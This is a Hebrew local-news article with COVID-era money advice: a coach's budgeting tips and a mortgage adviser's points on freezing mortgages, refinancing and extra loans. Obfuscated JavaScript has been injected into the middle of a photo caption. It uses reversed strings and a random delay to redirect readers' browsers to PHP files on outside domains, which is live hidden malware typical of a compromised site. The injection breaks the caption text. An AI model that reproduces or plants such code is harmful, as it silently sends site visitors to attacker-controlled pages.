fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

מתמודדים עם הנגיף הכלכלי: אל תיתנו ללחץ לנהל אתכם

אין כמעט בית בישראל שהקורונה הכלכלית לא פגעה בו בצורה זו או אחרת. עינת וזנה, מאמנת להצלחה והתפתחות אישית, ואורון גלנטר, יועץ משכנתאות, משתפים בטיפים שיקלו על ההתמודדות שלכם. כדאי להקשיב להם
הנגיף הכלכלי | צילום: shutterstock
הנגיף הכלכלי | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

בימי קורונה כולנו חרדים יותר. חוסר הוודאות מצליח להוציא את הנפש שלנו מאיזון, ובער"ן מדווחים על עליה משמעותית בפניות למוקדי סיוע נפשי. מעבר לדאגה הבריאותית, הלחץ הכלכלי הוא גורם מרכזי לתחושת החרדה. החל משינוי הרגלים ועד למציאת עבודה חדשה, בימי הקורונה אנו נאלצים להתמודד עם מצבים חדשים, כשהמגפה הכלכלית מאיימת לפגוע בכל בית אב בישראל.
עינת וזנה, מאמנת להצלחה והתפתחות אישית, ואורון גלנטר, יועץ משכנתאות, משתפים בטיפים שיקלו על ההתמודדות שלכם עם הקורונה הכלכלית.

מוציאים יותר כסף במקום לחסוך

"אני מלווה משפחות של עצמאים וגם של שכירים" מספרת עינת וזנה, "ואין אחד שלא נפגע מהמצב הנוכחי. מה שמלווה את כולם זה תחושת חוסר הוודאות והלחץ, וזה מאוד משפיע על ההחלטות הכלכליות שאנחנו מקבלים. רובנו לא מתפקדים טוב בשעת לחץ, לכן יש נטייה לאגור מזון או לפצות על התחושות שלנו עם קניות ברשת. גם העובדה שהילדים בבית ולא יכולים לצאת למסגרות שלהם גורמת לנו לרצות לפצות אותם בקניות אונליין, כך משפחות מוציאות יותר כסף במקום לחסוך".

עינת וזנה | צילום: עצמי
עינת וזנה | צילום: עצמי

 

הטיפ הראשון של וזנה הוא רישום מסודר של הוצאות והכנסות. "אם אני מקבל משכורת של 10,000 שקלים, אני אתייחס להכנסות שלי כאילו הן 7000 שקלים בלבד. ננסה להתקיים עם פחות כסף ממה שאנחנו מכניסים בפועל, ולא נשתמש בכל הכסף שאנחנו מכניסים לחשבון. נשתדל לחסוך כמה שאנחנו יכולים".

וזנה: "המחשבה היא שיוצרת לנו את הפעולות של הקנייה. המצב הקיים הוא לא בהכרח המחשבה שלי ואני אצטרך לשלוט בעצמי כדי להגיע למצב כלכלי טוב, אסור לנו להיכנע למחשבות של אחרים"

טיפ נוסף הוא לא לתת ללחץ לנהל אותנו. "כשאנחנו נמצאים בלחץ עלינו להבין שזו מחשבה ולא לתת ללחץ להשתלט עלינו. המחשבה היא שיוצרת לנו את הפעולות של הקנייה. המצב הקיים הוא לא בהכרח המחשבה שלי ואני אצטרך לשלוט בעצמי כדי להגיע למצב כלכלי טוב, אסור לנו להיכנע למחשבות של אחרים. יש אנשים שהמחשבה שלהם גורמת להם לאגור מזון ולקנות פי שניים ממה שהם צריכים, למרות שהמצב הקיים לא כך, והסופרים לא צופים מחסור במזון".

תהיו פתוחים לשינוי בחיים שלכם

עיקרון נוסף שחשוב לשמור עליו הוא גמישות. "כל חודש שונה מקודמו ואנחנו צריכים להתגמש במחשבות שלנו. עלינו להתאים את המצב למה שקורה ולשנות הרגלים, גם אם אני רגיל ללכת פעמיים בשבוע למסעדות או להזמין סרטים בווי או די, צריך למצוא פתרונות אחרים, גם אם הם לא פשוטים עבורנו. תהיו פתוחים לשינוי בחיים שלכם. יש המון דוגמאות של בעלי עסקים מצליחים, שהיו להם הכנסה קבועה ומוניטין, שלא ישבו וחיכו שהממשלה תפתח את העסק שלהם מחדש. הם חיפשו עבודה אחרת שתספק להם הכנסה לתקופה הקרובה למרות הקושי שבדבר והתגובות האפשריות של הסביבה שלהם. כשהם עשו שינוי תפיסתי הם הבינו שזו רק תקופה וזה אפשרי".

מחזרו משכנתה לפני שהריבית תתייקר

אורון גלנטר, המייסד של גלנטר משכנתאות, פונה מדי שבוע לעוקבים שלו ברשתות החברתיות ומשתף אותם בטיפים לקבלת משכנתה. בתקופת הקורונה גם הטיפים משתנים, וגלנטר ריכז עבורכם את כל מה שאתם צריכים לדעת.

"קודם כל חשוב לדעת שיש לכם אפשרות להקפיא את המשכנתה. אם אתם לא עומדים בתשלומי המשכנתה, אתם יכולים להקפיא אותה ולשלם רק את הריבית. אמנם במצטבר זה יעלה לכם כסף, אבל יש זוגות שכרגע אין להם הכנסה והקפאת המשכנתה תוכל לעזור להם".

אורון גלנטר | צילום: עצמי

 

אפשרות נוספת העומדת בפניכם היא לקיחת הלוואה לכל מטרה עד 70 אחוזים מגובה הנכס. גלנטר: "בנק ישראל מאפשר היום הלוואה לכל מטרה עד 70 אחוזים מגובה הנכס כולל משכנתה. משמע, אם הבית שלכם עולה מיליון שקלים, יש לכם משכנתה של 500 אלף שקלים והלוואות של עוד 100 אלף שקלים בתנאי משכנתה. כך שאם מישהו כרגע בחובות ואין לו כסף, הוא יכול לקבל הלוואה נוספת בפרישה של 30 שנה, כך שההחזר מאוד נמוך".

גלנטר: "זה לא משנה כמה משכנתה אתם יכולים להחזיר, לפי החוק או לפי הבנק, חשוב כמה כסף נשאר לכם בסוף החודש לאחר ההוצאות שלכם, ובהתאם לזה לשלם את המשכנתה שלכם"

דבר נוסף שחשוב לדעת. "הרבה אנשים לא עוקבים אחר ההתנהלות הכלכלית שלהם. הם לא יודעים כמה הם צורכים בחודש וכמה הם מבזבזים על מותרות או על מוצרי יסוד. זה לא משנה כמה משכנתה אתם יכולים להחזיר, לפי החוק או לפי הבנק, חשוב כמה כסף נשאר לכם בסוף החודש לאחר ההוצאות שלכם, ובהתאם לזה לשלם את המשכנתה שלכם".

התקופה הזו היא גם הזדמנות מצוינת לבצע מחזורי משכנתה. גלנטר ממליץ להזדרז לפני שהריביות יעלו. "אם כרגע אתם בתהליכים של לקיחת משכנתה עדיף לכם לזרז תהליכים. אנחנו יודעים שהבנקים התחילו להעלות ריביות, אז כדי שתספיקו ליהנות מהריביות הנמוכות שווה להזדרז ועדיף לא לפספס את הרכבת".

כתבות נוספות

בקרו אותנו גם בפייסבוק: הד הקריות

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות